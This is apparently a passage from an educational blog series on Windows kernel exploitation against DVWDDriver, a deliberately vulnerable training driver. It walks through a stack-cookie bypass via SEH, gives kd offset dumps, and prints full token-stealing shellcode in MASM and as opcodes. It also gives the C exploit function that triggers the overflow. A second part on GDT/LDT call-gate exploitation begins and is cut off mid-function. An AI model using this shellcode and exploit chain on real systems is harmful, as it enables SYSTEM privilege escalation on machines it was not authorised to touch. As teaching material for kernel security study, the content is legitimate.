      So, this is the proof that the kernel stack has been overflowed. We can see all our 'A's (0x41) in the dump of the stack at the time of the crash. But what is important to notice here is the error message: DRIVER_OVERRAN_STACK_BUFFER (f7), which means that the stack overflow has been directly detected by the kernel. This error confirms that a Stack-Cookie - also called a Stack-Canary - is used in order to prevent the exploitation of stack overflows... well, to try to prevent it =). The principle is the same as in userland with the /GS flag of the MS Visual Studio compiler. Basically, a security cookie (a pseudo-random 4-byte value) is put on the stack between the local variables and the saved value of EBP, so that we have to overwrite this value if we want to reach and overwrite the saved EIP value. And of course, in the epilogue of the function, the security cookie value is checked against the original value (expected value). If they don't match, the fatal error we're facing is triggered!
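
The bugcheck arguments shown above can be cross-checked by hand. The short Python sketch below (Python is used only for the arithmetic) verifies that Arg3 really is the 32-bit complement of Arg2. It also shows something that is an interpretation rather than a fact reported by the debugger: XORing the "actual" cookie with 0x41414141 gives 0xf5d6fc10, which is exactly the frame address of the overflowed function in STACK_TEXT. That is consistent with the compiler XORing the cookie with the frame pointer before storing it on the stack, so the value really found on the stack would simply be our 'AAAA'.

```python
MASK32 = 0xFFFFFFFF

# Values copied from the !analyze -v output above.
ACTUAL_COOKIE = 0xB497BD51    # Arg1
EXPECTED_COOKIE = 0xF786C6EA  # Arg2
COMPLEMENT = 0x08793915       # Arg3


def complement32(value: int) -> int:
    """Bitwise NOT truncated to 32 bits."""
    return ~value & MASK32


def cookie_intact(actual: int, expected: int) -> bool:
    """Same comparison as the epilogue check: any difference is fatal."""
    return actual == expected


print(f"{complement32(EXPECTED_COOKIE):08x}")          # 08793915
print(cookie_intact(ACTUAL_COOKIE, EXPECTED_COOKIE))   # False
print(f"{ACTUAL_COOKIE ^ 0x41414141:08x}")             # f5d6fc10
```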

      2. Stack-Canary ?

      If we disassemble the vulnerable function, here is what we can see:


      In the prologue of the function, there is a call to __SEH_prolog4_GS; this function is used to:
      • Set up the exception handler block (EXCEPTION_REGISTRATION_RECORD) corresponding to the __try { } __except { } written in the function,
      • Set up the Stack-Canary

      Moreover, in the epilogue of the function, we can see a call to __SEH_epilog4_GS; this function retrieves the current value of the Stack-Canary and calls the __security_check_cookie() function. The latter compares the current value with the expected value of the Stack-Canary. This expected value (symbol: __security_cookie) is stored in the .data segment. If the values don't match, the OS crashes in the same way as during the previous test.
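
The prologue/epilogue mechanism can be pictured with a toy model. The Python sketch below is a deliberate simplification and makes several assumptions: the frame is reduced to [64-byte buffer][cookie][saved EBP][return address], the saved EBP and return address are placeholder values, and the SEH record and the XOR with the frame pointer are left out. It only illustrates why a copy longer than the buffer is noticed by the check.

```python
import struct

BUF_SIZE = 64  # size of the driver's local buffer, as stated in the article


def make_frame(cookie: int) -> bytearray:
    """Simplified frame: [64-byte buffer][cookie][saved EBP][return address]."""
    # 0x11111111 and 0x22222222 are placeholders, not real addresses.
    return bytearray(BUF_SIZE) + bytearray(
        struct.pack("<III", cookie, 0x11111111, 0x22222222)
    )


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy without checking BUF_SIZE (clipped to the modeled frame)."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def cookie_ok(frame: bytearray, expected: int) -> bool:
    """What the epilogue does: compare the stored cookie with the expected one."""
    (stored,) = struct.unpack_from("<I", frame, BUF_SIZE)
    return stored == expected


COOKIE = 0xF786C6EA  # expected cookie from the bugcheck output

small = make_frame(COOKIE)
unchecked_copy(small, b"A" * 32)
print(cookie_ok(small, COOKIE))  # True

big = make_frame(COOKIE)
unchecked_copy(big, b"A" * 511)
print(cookie_ok(big, COOKIE))    # False
```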



      3. How to bypass the Stack-Canary in KernelLand ?

      In order to bypass the Stack-Canary, the goal is to trigger an exception before the cookie is checked, that is to say before the call to the __security_check_cookie() function. In userland, the typical way to do it is to send a buffer large enough to write past the end of the stack, until we reach an unmapped page and trigger a memory fault. However, this doesn't work in kernelland, because memory faults that occur in kernel memory areas are not handled by exception handlers but simply crash the OS (BSOD).

      So, the idea is to generate a memory fault exception due to the access of an unmapped page in userland, not in kernelland. To do so, we'll create a mapped memory area (anonymous map) using CreateFileMapping() (see [1]) and MapViewOfFileEx() (see [2]) API calls. Then we fill this area with the address of the shellcode we'll write later on.
      It's important to understand that we pass a pointer to a user-space buffer, and its size, to the driver when we send a DEVICEIO_DVWD_STACKOVERFLOW IOCTL. The trick is to adjust the pointer to the buffer in such a way that the end of the buffer will sit in the unmapped page that follows. It's actually sufficient to put only the last 4 bytes of the buffer outside the anonymous map. This is well illustrated in the book of DVWDDriver's authors with this figure:



      By doing so, when the driver reads the content of the buffer (for the copy), it ends up reading an unmapped memory area in userland. An exception is therefore triggered, and the Stack-Canary can be bypassed by using SEH exploitation in kernelland.
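The pointer adjustment is plain arithmetic, sketched below in portable C. The helper name place_buffer and the constant TAIL_OUTSIDE are hypothetical; the 4 bytes correspond to one pointer on the 32-bit target, and the sizes used in the usage note are illustrative values, not the ones from the exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Number of bytes of the buffer that must fall in the unmapped page
   (one 32-bit pointer on the x86 target). */
#define TAIL_OUTSIDE 4u

/* Return the address at which a buffer of buff_size bytes has to start so
   that only its last TAIL_OUTSIDE bytes lie past the end of the mapping
   [map_base, map_base + map_size). */
static uintptr_t place_buffer(uintptr_t map_base, size_t map_size, size_t buff_size)
{
    assert(buff_size > TAIL_OUTSIDE);
    assert(buff_size - TAIL_OUTSIDE <= map_size);
    return map_base + map_size - (buff_size - TAIL_OUTSIDE);
}
```

For instance, with a 0x10000-byte mapping at 0x10000 and a 0x200-byte buffer, place_buffer(0x10000, 0x10000, 0x200) gives 0x1FE04: the buffer ends at 0x20004, so its last dword starts exactly at the first unmapped byte.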


      4. Shellcoding

      I've decided not to use the same shellcode as the one given in the DVWDExploit for my tests. Instead of patching the SID in the Access Token of the exploit process, I use another privilege escalation method: stealing the Access Token of a process that is running with Owner SID == NT AUTHORITY\SYSTEM SID, and overwriting the Access Token of the exploit process with the stolen one.

      I haven't reinvented the wheel to write the shellcode; I just relied on two great papers, [4] and [5]. The shellcode I've used is directly taken/adapted from those papers. The algorithm is the following:

      1. Find _KTHREAD structure corresponding to the current thread, into _KPRCB
      2. Find _EPROCESS structure corresponding to the current process, into _KTHREAD
      3. Look for _EPROCESS corresponding to the process with PID=4 (UniqueProcessId = 4) ; this is the "System" process that always has SID = NT AUTHORITY\SYSTEM SID.
      4. Retrieve the address of the Token of that process
      5. Look for _EPROCESS corresponding to the process we want to escalate
      6. Replace the Token of that process with the Token of the "System" process
      7. Return to userland using the SYSEXIT instruction. Before calling SYSEXIT, we set the registers as explained in [4] in order to jump directly to our payload in userland, which will run with full privileges.
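Steps 3 to 6 can be illustrated with a user-mode model in C before looking at the real offsets. This is only a sketch: mock_eprocess is a made-up structure that keeps the three fields the algorithm needs (its layout does not match the real _EPROCESS), the list contains only processes (no separate list head), and the names find_process and steal_token are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mock structures: only the fields used by the algorithm are modelled. */
struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

struct mock_eprocess {
    uintptr_t         unique_process_id;
    struct list_entry active_process_links;
    uintptr_t         token;   /* like _EX_FAST_REF: pointer | 3 low bits */
};

/* Go from the embedded list entry back to the structure that contains it
   (what the shellcode does by subtracting the Flink offset). */
static struct mock_eprocess *from_links(struct list_entry *e)
{
    return (struct mock_eprocess *)
        ((char *)e - offsetof(struct mock_eprocess, active_process_links));
}

/* Walk the circular list, starting with the process after 'start', until
   'pid' is found. Returns NULL after one full turn (the shellcode itself
   has no such guard). */
static struct mock_eprocess *find_process(struct mock_eprocess *start, uintptr_t pid)
{
    struct mock_eprocess *p = start;
    assert(start != NULL);
    do {
        p = from_links(p->active_process_links.flink);
        if (p->unique_process_id == pid)
            return p;
    } while (p != start);
    return NULL;
}

/* Steps 3 to 6: copy the token of 'system_pid' into 'target_pid'. */
static int steal_token(struct mock_eprocess *current,
                       uintptr_t system_pid, uintptr_t target_pid)
{
    struct mock_eprocess *sys = find_process(current, system_pid);
    struct mock_eprocess *dst = find_process(current, target_pid);
    if (sys == NULL || dst == NULL)
        return 0;
    dst->token = sys->token & ~(uintptr_t)7;   /* keep the aligned pointer only */
    return 1;
}
```

Calling steal_token(current, 4, pid_of_exploit) on such a list leaves the target process holding the same token pointer as the process with PID 4, which is the whole point of the shellcode.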

      The first step consists in finding the right offsets in the kernel structures for Windows Server 2003 SP2. To do so, we're going to dig into those structures using kd:

      kd> r
      eax=00000001 ebx=000063a3 ecx=80896d4c edx=000002f8 esi=00000000 edi=ed8fcfa8
      eip=8086cf70 esp=80894560 ebp=80894570 iopl=0         nv up ei pl nz na po nc
      cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
      
      kd> dg @fs
                                        P Si Gr Pr Lo
      Sel    Base     Limit     Type    l ze an es ng Flags
      ---- -------- -------- ---------- - -- -- -- -- --------
      0030 ffdff000 00001fff Data RW    0 Bg Pg P  Nl 00000c92
      
      kd> dt nt!_kpcr ffdff000
         [...]
         +0x120 PrcbData         : _KPRCB
         
      kd> dt nt!_kprcb ffdff000+0x120
         +0x000 MinorVersion     : 1
         +0x002 MajorVersion     : 1
         +0x004 CurrentThread    : 0x80896e40 _KTHREAD
         +0x008 NextThread       : (null)
         +0x00c IdleThread       : 0x80896e40 _KTHREAD
         [...]
      
      
      kd> dt nt!_kthread 0x80896e40
         +0x000 Header           : _DISPATCHER_HEADER
         +0x010 MutantListHead   : _LIST_ENTRY [ 0x80896e50 - 0x80896e50 ]
         +0x018 InitialStack     : 0x808948b0 Void
         +0x01c StackLimit       : 0x808918b0 Void
         +0x020 KernelStack      : 0x808945fc Void
         +0x024 ThreadLock       : 0
         +0x028 ApcState         : _KAPC_STATE
         +0x028 ApcStateFill     : [23]  "hn???"
         +0x03f ApcQueueable     : 0x1 ''
         [...]
         
         
      kd> dt nt!_kapc_state 0x80896e40+0x28
         +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0x80896e68 - 0x80896e68 ]
         +0x010 Process          : 0x808970c0 _KPROCESS
         +0x014 KernelApcInProgress : 0 ''
         +0x015 KernelApcPending : 0 ''
         +0x016 UserApcPending   : 0 ''
         
      kd> dt nt!_eprocess 0x808970c0
         +0x000 Pcb              : _KPROCESS
         +0x078 ProcessLock      : _EX_PUSH_LOCK
         +0x080 CreateTime       : _LARGE_INTEGER 0x0
         +0x088 ExitTime         : _LARGE_INTEGER 0x0
         +0x090 RundownProtect   : _EX_RUNDOWN_REF
         +0x094 UniqueProcessId  : (null)
         +0x098 ActiveProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
         +0x0a0 QuotaUsage       : [3] 0
         +0x0ac QuotaPeak        : [3] 0
         +0x0b8 CommitCharge     : 0
         +0x0bc PeakVirtualSize  : 0
         +0x0c0 VirtualSize      : 0
         +0x0c4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
         +0x0cc DebugPort        : (null)
         +0x0d0 ExceptionPort    : (null)
         +0x0d4 ObjectTable      : 0xe1000c60 _HANDLE_TABLE
         +0x0d8 Token            : _EX_FAST_REF
         +0x0dc WorkingSetPage   : 0x17f40
         [...]
         
      kd> dt nt!_list_entry
         +0x000 Flink            : Ptr32 _LIST_ENTRY
         +0x004 Blink            : Ptr32 _LIST_ENTRY
      
      kd> dt nt!_token -r1 @@(0xe1001727 & ~7)
         +0x000 TokenSource      : _TOKEN_SOURCE
            +0x000 SourceName       : [8]  "*SYSTEM*"
            +0x008 SourceIdentifier : _LUID
         +0x010 TokenId          : _LUID
            +0x000 LowPart          : 0x3ea
            +0x004 HighPart         : 0n0
         +0x018 AuthenticationId : _LUID
            +0x000 LowPart          : 0x3e7
            +0x004 HighPart         : 0n0
         +0x020 ParentTokenId    : _LUID
            +0x000 LowPart          : 0
            +0x004 HighPart         : 0n0
         +0x028 ExpirationTime   : _LARGE_INTEGER 0x6207526`b64ceb90
            +0x000 LowPart          : 0xb64ceb90
            +0x004 HighPart         : 0n102790438
            +0x000 u                : __unnamed
            +0x000 QuadPart         : 0n441481572610010000
         [...]
      

      From this, we can deduce the following offsets that will be useful for writing the shellcode for Windows Server 2003 SP2:

      • _KTHREAD: located at fs:[0x124] (where the FS segment descriptor points to _KPCR)
      • _EPROCESS: 0x38 from the beginning of _KTHREAD
      • _EPROCESS.ActiveProcessLinks: a doubly-linked list that links the _EPROCESS structures of all the processes. It's located at offset 0x98 from the beginning of _EPROCESS. Since Flink is the first field of _LIST_ENTRY, this is also the offset of the pointer to the next element of the list.
      • _EPROCESS.UniqueProcessId: the PID of the corresponding process. It is located at offset 0x94 from the beginning of _EPROCESS.
      • _EPROCESS.Token: an _EX_FAST_REF that references the Access Token. Its offset in _EPROCESS is 0xD8. Note that the token address is aligned on 8 bytes, so the 3 low bits of the stored value must be masked out before using it (as done with & ~7 in the kd command above).

      The resulting shellcode, written for MASM, is the following:

      .486
      .model flat,stdcall
      option casemap:none
      include \masm32\include\windows.inc
      include \masm32\include\kernel32.inc
      includelib \masm32\lib\kernel32.lib
      assume fs:nothing
      
      .code
      
      shellcode:
      
      ; ----------------------------------------------------------------------
      ;                  Shellcode for Windows Server 2k3
      ; ----------------------------------------------------------------------
      
      ; Offsets
      WIN2K3_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PrcbData.CurrentThread
      WIN2K3_EPROCESS_OFFSET  equ 038h    ; nt!_KTHREAD.ApcState.Process
      WIN2K3_FLINK_OFFSET     equ 098h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
      WIN2K3_PID_OFFSET       equ 094h    ; nt!_EPROCESS.UniqueProcessId
      WIN2K3_TOKEN_OFFSET     equ 0d8h    ; nt!_EPROCESS.Token
      WIN2K3_SYS_PID          equ 04h     ; PID Process SYSTEM
      
      
      pushad                                ; save registers
      
      mov eax, fs:[WIN2K3_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
      mov eax, [eax+WIN2K3_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
      push eax
      
      
      mov ebx, WIN2K3_SYS_PID
      
      SearchProcessPidSystem:
      
      mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
      sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
      cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == SYSTEM PID ?
      jne SearchProcessPidSystem            ; if no, retry with the next process...
      
      mov edi, [eax+WIN2K3_TOKEN_OFFSET]    ; EDI <- Token of process with SYSTEM PID
      and edi, 0fffffff8h                   ; Must be aligned by 8
      
      pop eax                               ; EAX <- current _EPROCESS 
      
      
      mov ebx, 41414141h
      
      SearchProcessPidToEscalate:
      
      mov eax, [eax+WIN2K3_FLINK_OFFSET]    ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
      sub eax, WIN2K3_FLINK_OFFSET          ; EAX <- _EPROCESS of the next process
      cmp [eax+WIN2K3_PID_OFFSET], ebx      ; UniqueProcessId == PID of the process 
                                            ; to escalate ?
      jne SearchProcessPidToEscalate        ; if no, retry with the next process...
      
      SwapTokens:
      
      mov [eax+WIN2K3_TOKEN_OFFSET], edi    ; We replace the token of the process 
                                            ; to escalate by the token of the process
                                            ; with SYSTEM PID
      
      PartyIsOver:
      
      popad                                 ; restore registers
      mov edx, 11111111h                    ; EIP value after SYSEXIT
      mov ecx, 22222222h                    ; ESP value after SYSEXIT
      mov eax, 3Bh                          ; FS value in userland (points to _TEB)
      db 8Eh, 0E0h                          ; mov fs, ax
      db 0Fh, 35h                           ; SYSEXIT
      
      end shellcode

      We assemble this asm code with MASM and retrieve the corresponding sequence of opcodes (Tools > Load Binary File as Hex). We get:
      00000200 :60 64 A1 24 01 00 00 8B - 40 38 50 BB 04 00 00 00
      00000210 :8B 80 98 00 00 00 2D 98 - 00 00 00 39 98 94 00 00
      00000220 :00 75 ED 8B B8 D8 00 00 - 00 83 E7 F8 58 BB 41 41
      00000230 :41 41 8B 80 98 00 00 00 - 2D 98 00 00 00 39 98 94
      00000240 :00 00 00 75 ED 89 B8 D8 - 00 00 00 61 BA 11 11 11
      00000250 :11 B9 22 22 22 22 B8 3B - 00 00 00 8E E0 0F 35 00

      Of course, before using this shellcode, it's necessary to replace its three placeholders: the PID of the process to escalate (0x41414141) and the EIP and ESP values used after SYSEXIT (0x11111111 and 0x22222222). We'll do that in the code before sending the buffer.
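One simple way to do this patching is to search the opcode array for each placeholder and overwrite it in place. The sketch below is an assumption about how it can be done, not the code of the exploit: patch_dword is a hypothetical helper, and the PID, EIP and ESP values in the usage note are arbitrary examples. The byte array is the hex dump above without its trailing padding byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Opcodes taken from the hex dump above (95 bytes). */
static unsigned char swap_tokens_shellcode[] = {
    0x60, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0x40, 0x38, 0x50, 0xBB, 0x04, 0x00, 0x00, 0x00,
    0x8B, 0x80, 0x98, 0x00, 0x00, 0x00, 0x2D, 0x98, 0x00, 0x00, 0x00, 0x39, 0x98, 0x94, 0x00, 0x00,
    0x00, 0x75, 0xED, 0x8B, 0xB8, 0xD8, 0x00, 0x00, 0x00, 0x83, 0xE7, 0xF8, 0x58, 0xBB, 0x41, 0x41,
    0x41, 0x41, 0x8B, 0x80, 0x98, 0x00, 0x00, 0x00, 0x2D, 0x98, 0x00, 0x00, 0x00, 0x39, 0x98, 0x94,
    0x00, 0x00, 0x00, 0x75, 0xED, 0x89, 0xB8, 0xD8, 0x00, 0x00, 0x00, 0x61, 0xBA, 0x11, 0x11, 0x11,
    0x11, 0xB9, 0x22, 0x22, 0x22, 0x22, 0xB8, 0x3B, 0x00, 0x00, 0x00, 0x8E, 0xE0, 0x0F, 0x35
};

/* Replace the first little-endian occurrence of 'marker' in code[0..len)
   with 'value'. Returns the patched offset, or -1 if the marker is absent. */
static long patch_dword(unsigned char *code, size_t len, uint32_t marker, uint32_t value)
{
    assert(code != NULL);
    for (size_t i = 0; i + 4 <= len; i++) {
        uint32_t found = (uint32_t)code[i]
                       | (uint32_t)code[i + 1] << 8
                       | (uint32_t)code[i + 2] << 16
                       | (uint32_t)code[i + 3] << 24;
        if (found == marker) {
            code[i]     = (unsigned char)(value & 0xFF);
            code[i + 1] = (unsigned char)((value >> 8) & 0xFF);
            code[i + 2] = (unsigned char)((value >> 16) & 0xFF);
            code[i + 3] = (unsigned char)((value >> 24) & 0xFF);
            return (long)i;
        }
    }
    return -1;
}
```

For example, patch_dword(swap_tokens_shellcode, sizeof swap_tokens_shellcode, 0x41414141, pid) rewrites the immediate of the second "mov ebx" instruction; the same call with 0x11111111 and 0x22222222 sets the EIP and ESP loaded before SYSEXIT. Searching by value avoids hard-coding offsets, at the cost of assuming that the placeholder bytes do not occur elsewhere in the code.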

      5. Methodology of exploitation

      The exploitation process is the following:

      1. Create an executable memory area and put the previous shellcode (for swapping tokens) in that area.
      2. Similarly, create an executable memory area and put the shellcode that must be executed after the privilege escalation (the payload)
      3. Update the first shellcode with: PID of the process to escalate, EIP to use after SYSEXIT, ESP to use after SYSEXIT. The method is taken from [4].
      4. Create an anonymous map for our buffer
      5. Fill this map with the address of the first shellcode
      6. Adjust the pointer to the buffer in such a way that the last 4 bytes are in an unmapped memory area
      7. Send the buffer to the driver with the DEVICEIO_DVWD_STACKOVERFLOW IOCTL.
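Step 5 relies on a helper called FillMap() whose body is not shown in this post. A minimal portable sketch of what such a helper may look like is given below; the name fill_map and its exact behaviour are assumptions. Repeating the address over the whole area presumably ensures that whichever dword of the buffer ends up over the exception handler pointer holds the address of the shellcode.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fill 'size' bytes at 'map' with the 32-bit value 'address' repeated,
   written in little-endian order as on the x86 target. A trailing
   remainder of fewer than 4 bytes is left untouched. */
static void fill_map(unsigned char *map, uint32_t address, size_t size)
{
    assert(map != NULL);
    for (size_t i = 0; i + 4 <= size; i += 4) {
        map[i]     = (unsigned char)(address & 0xFF);
        map[i + 1] = (unsigned char)((address >> 8) & 0xFF);
        map[i + 2] = (unsigned char)((address >> 16) & 0xFF);
        map[i + 3] = (unsigned char)((address >> 24) & 0xFF);
    }
}
```

In the exploit, the equivalent call receives the anonymous map, the address of the token-swapping shellcode and the allocation granularity as its size.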

      6. Exploit code

      Here is the main function of the exploit. It should be quite straightforward after the previous explanations.

      VOID TriggerOverflow32(VOID) {
      
       HANDLE hFile;
       DWORD dwReturn;
       UCHAR* map;
       UCHAR *uBuff = NULL;
       BOOL ret;
       ULONG_PTR pShellcode;
      
       // Load the Kernel Executive ntoskrnl.exe in userland and get some 
       // symbol's kernel address
       if(LoadAndGetKernelBase() == FALSE)
        return;
      
       
       // Put the shellcodes in executable memory
       mapShellcodeSwapTokens = (UCHAR *)CreateUspaceExecMapping(1);
       mapShellcodePayload    = (UCHAR *)CreateUspaceExecMapping(1);
      
       memset(mapShellcodeSwapTokens, '\x00', GlobalInfo.dwAllocationGranularity);
       memset(mapShellcodePayload, '\x00', GlobalInfo.dwAllocationGranularity);
      
       RtlCopyMemory(mapShellcodeSwapTokens, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
       RtlCopyMemory(mapShellcodePayload, ShellcodePayload, sizeof(ShellcodePayload));
      
      
       // Added
       printf("[~] Update Shellcode with PID of the process...\n");
       if(!MajShellcodePid(L"DVWDExploit.exe")) {
        printf("[!] An error occurred, exiting...\n");
        return;
       }
      
       printf("[~] Update Shellcode with EIP to use after SYSEXIT...\n");
       if(!MajShellcodeEip()) {
        printf("[!] An error occurred, exiting...\n");
        return;
       }
      
       printf("[~] Update Shellcode with ESP to use after SYSEXIT...\n");
       if(!MajShellcodeEsp()) {
        printf("[!] An error occurred, exiting...\n");
        return;
       }
       
       printf("[~] Retrieve the address of the shellcode and build the buffer...\n");
      
       // Create an anonymous map
       map = (UCHAR *)CreateUspaceMapping(1);
       // Retrieve the address of the shellcode
       pShellcode = (ULONG_PTR)mapShellcodeSwapTokens;
       
       // We fill the map with the address of our shellcode (the address is repeated)
       FillMap(map, pShellcode, GlobalInfo.dwAllocationGranularity);
      
       // We adjust the pointer to the buffer (size = BUFF_SIZE) in such a way that the 
       // last 4 bytes are in an unmapped memory area
       uBuff = map + GlobalInfo.dwAllocationGranularity - (BUFF_SIZE-sizeof(ULONG_PTR));
      
       // Now, we send our buffer to the driver and trigger the overflow
       hFile = CreateFile(_T("\\\\.\\DVWD"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
       deviceHandle = hFile;
      
       if(hFile != INVALID_HANDLE_VALUE)
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STACKOVERFLOW, uBuff, BUFF_SIZE, NULL, 0, &dwReturn, NULL);
      
       // If you get here the vulnerability has not been triggered ...
       printf("[!] Stack overflow has not been triggered, maybe the driver has not been loaded ?\n");
       return;
      }

      7. All your base are belong to us


      For testing purposes, I've used a simple windows/exec calc.exe shellcode from Metasploit as the payload. However, we can put whatever we want there...


      Our calc.exe is running with NT AUTHORITY\SYSTEM privileges, which means that the privilege escalation succeeded and that the payload was then executed correctly.


      References

      [1] CreateFileMapping() function
      http://msdn.microsoft.com/en-us/library/aa366537(v=vs.85).aspx

      [2] MapViewOfFileEx() function 
      http://msdn.microsoft.com/en-us/library/aa366763(v=VS.85).aspx

      [3] Remote Debugging using VMWare
      http://www.catch22.net/tuts/vmware

      [4] Local Stack Overflow in Windows Kernel, by Heurs
      http://www.ghostsinthestack.org/article-29-local-stack-overflow-in-windows-kernel.html

      [5] Exploiting Windows Device Drivers, by Piotr Bania
      http://pb.specialised.info/all/articles/ewdd.pdf

      Windows Kernel Exploitation Basics - Part 3 : Arbitrary Memory Overwrite exploitation using LDT



      In the previous post, we've seen an exploitation of the write-what-where vulnerability in DVWDDriver based on overwriting a pointer located in the kernel dispatch table HalDispatchTable. That technique relies on an undocumented syscall, so it is not guaranteed to keep working across system updates, as the great paper [1] points out. The technique detailed in this post is instead based on the hardware-specific structures GDT and LDT, which are more likely to remain the same across the different Windows versions. This is another method that is briefly presented in the book "A guide to Kernel Exploitation". Some background about the GDT and LDT is required first, so let's open our Intel Manual =)

      1. Windows GDT and LDT

      According to the Intel Manual [2], Segmentation is implemented using a Segment Selector, which is a 16-bit value. A Logical Address is composed of:
      • An offset, which is a 32-bit value,
      • A Segment Selector, which is a 16-bit value.
      Since a picture is worth a thousand words, here's a global overview of the Segmentation and Paging mechanisms (Logical address -> Linear address -> Physical address):



        The previous figure shows how the logical address is translated into a linear address by Segmentation. Then the Paging mechanism comes into play: it translates the linear address into a physical address. Paging is actually an optional feature of Intel processors; if it is not used, linear address == physical address. Windows uses Paging, so the linear address is itself split into 3 subfields whose values are used as offsets into arrays in order to get the physical address.
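As an illustration of those 3 subfields, the sketch below splits a 32-bit linear address the way classic 32-bit paging with 4 KB pages does (10 + 10 + 12 bits). This layout is an assumption: a system running with PAE enabled uses a different split. The names linear_parts, split_linear and join_linear are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

struct linear_parts {
    uint32_t directory;  /* bits 31..22: index into the page directory */
    uint32_t table;      /* bits 21..12: index into the page table     */
    uint32_t offset;     /* bits 11..0 : offset inside the 4 KB page   */
};

/* Split a linear address into its three subfields. */
static struct linear_parts split_linear(uint32_t linear)
{
    struct linear_parts p;
    p.directory = linear >> 22;
    p.table     = (linear >> 12) & 0x3FFu;
    p.offset    = linear & 0xFFFu;
    return p;
}

/* Inverse operation, to check that no bit is lost. */
static uint32_t join_linear(struct linear_parts p)
{
    assert(p.directory <= 0x3FFu && p.table <= 0x3FFu && p.offset <= 0xFFFu);
    return (p.directory << 22) | (p.table << 12) | p.offset;
}
```

Under that assumption, the address 0x80896e40 seen earlier in the kd output splits into directory index 0x202, table index 0x096 and page offset 0xe40.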

        Moreover, we can see that the Segment Selector references an entry in a table, and that this entry describes a segment (Segment Descriptor) in the linear address space: this table is the GDT. OK, but how does it really work, and wtf is that LDT?! Let's go back to our Intel Manual... =)

        We learn that the GDT (Global Descriptor Table) and the LDT (Local Descriptor Table) are the 2 kinds of Segment Descriptor tables. We can also see this awesome figure:



        Having a GDT is mandatory: every system must create one when it starts up. There is a single GDT per processor for the entire system (that's why it's a "global" table), and it can be shared by all the tasks on the system. Using an LDT is optional; it can be used by a single task or by a group of related tasks. An LDT is defined by a single GDT entry and is specific to a process, which means that this entry is replaced in the GDT during a process context switch.

        To give more details, the GDT normally contains:
        • A pair of kernel-mode code and data Segment Descriptors, with DPL = 0 (the DPL defines the privilege level of the segment being referenced, ie. the ring)
        • A pair of user-mode code and data Segment Descriptors, with DPL = 3
        • One TSS (Task State Segment), with DPL = 0. See [3]
        • 3 Additional data segment entries.
        • An optional LDT entry
        By default, a new process doesn't have any LDT, but one can be allocated if the process requests it. If a process has an LDT, its descriptor can be found in the LdtDescriptor field of the _KPROCESS kernel structure of that process:

        kd> dt nt!_kprocess
           +0x000 Header           : _DISPATCHER_HEADER
           +0x010 ProfileListHead  : _LIST_ENTRY
           +0x018 DirectoryTableBase : [2] Uint4B
           +0x020 LdtDescriptor    : _KGDTENTRY
           +0x028 Int21Descriptor  : _KIDTENTRY
           [...]
        

        2. Call-Gate

        A Call-Gate makes it possible to access code segments with different privilege levels:
        "Call-Gates facilitate controlled transfers of program control between different privilege levels. They are typically used only in operating systems or executives that use the privilege-level mechanism" (Intel Manual Vol. 3A & 3B [2], p. 201).

        A Call-Gate is a possible entry into GDT or LDT. It is a special sort of descriptor called a Call-Gate Descriptor. It's the same size as a Segment Descriptor (8 bytes), but some fields aren't organized in the same way. The figure below is taken from [1] and clearly shows the differences:



        In practice, a Call-Gate is useful to jump to code located in a different segment and running with different privileges (ring). Here's how things work when we call a Call-Gate:
        1. The processor accesses the Call-Gate Descriptor,
        2. It locates the Code Segment Descriptor we finally want to access, by using the Segment Selector contained in the Call-Gate Descriptor,
        3. It retrieves the Base Address contained in the Code Segment Descriptor and adds to it the offset value contained in the Call-Gate Descriptor.
        4. The result is the linear address of the code we want to access (Code linear address = Base Address + Offset).

        The article [4] (in French) explains how to add a Call-Gate that makes it possible to run code in Ring0 from Ring3. I won't repeat everything that is said in that great article, only what is useful for us right now:

        • The "Segment Selector" field must refer to the Segment Descriptor under which our payload will be executed. Because we want to run it with full privileges in Ring0, we'll refer to the Kernel Code Segment (CS) Descriptor. The right value is 0x0008.
        • The "DPL" field must be equal to 3 if we want to be able to access the Call-Gate from the userland.
        • The "Offset" field must be the address of the code we want to execute.
        • The "Type" field must be equal to 12 for Call-Gate Descriptor.
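The four fields above can be packed into the 8 bytes of a descriptor as sketched below. The bit positions follow the 32-bit Call-Gate Descriptor layout of the Intel Manual; the function names make_call_gate and gate_target are hypothetical, and the example address in the usage note is arbitrary.

```c
#include <assert.h>
#include <stdint.h>

#define GATE_TYPE_CALL32 0xCu   /* 32-bit Call-Gate (type 12) */

/* Build a present 32-bit Call-Gate Descriptor as a 64-bit value. */
static uint64_t make_call_gate(uint32_t offset, uint16_t selector,
                               unsigned dpl, unsigned param_count)
{
    uint64_t d = 0;
    assert(dpl <= 3 && param_count <= 31);
    d |= (uint64_t)(offset & 0xFFFFu);        /* bits  0..15: offset 15..0   */
    d |= (uint64_t)selector << 16;            /* bits 16..31: code selector  */
    d |= (uint64_t)param_count << 32;         /* bits 32..36: param count    */
    d |= (uint64_t)GATE_TYPE_CALL32 << 40;    /* bits 40..43: type           */
    d |= (uint64_t)dpl << 45;                 /* bits 45..46: DPL            */
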